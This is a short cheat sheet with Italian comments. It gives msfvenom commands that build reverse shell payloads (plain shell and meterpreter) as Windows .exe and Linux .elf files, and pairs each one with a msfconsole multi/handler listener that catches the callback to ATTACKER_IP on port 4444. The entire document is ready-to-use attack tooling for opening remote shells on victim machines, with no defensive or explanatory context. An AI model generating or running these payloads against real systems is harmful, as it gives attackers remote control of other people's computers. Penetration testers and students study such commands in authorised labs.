tags: payloads reverse_shell msfvenom


#Questo comando serve a creare un file con una reverse shell per Windows
 
msfvenom -p windows/shell/reverse_tcp -f exe LHOST=ATTACKER_IP LPORT=4444 -o shell.exe
 
#Questo è il suo relativo listener multi/handler
 
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/shell/reverse_tcp; set LHOST ATTACKER_IP; set LPORT 4444; exploit"
 
#Questo comando serve a generare una reverse shell per linux
 
msfvenom -p linux/x86/shell/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
 
#Questo è il suo relativo listener multi/handler
 
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/shell/reverse_tcp; set LHOST=ATTACKER_IP; set LPORT=4444; exploit"
 
#Questo serve a generare una reverse shell meterpreter per Windows
 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o meterpreter_shell.exe
 
#Questo è il suo relativo listener multi/handler
 
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST=ATTACKER_IP; set LPORT=4444; exploit"
 
#Questo comando serve a creare un file con una reverse shell meterpreter per Linux
 
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
 
#Questo è il suo relativo listener multi/handler
 
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST=ATTACKER_IP; set LPORT=4444; exploit"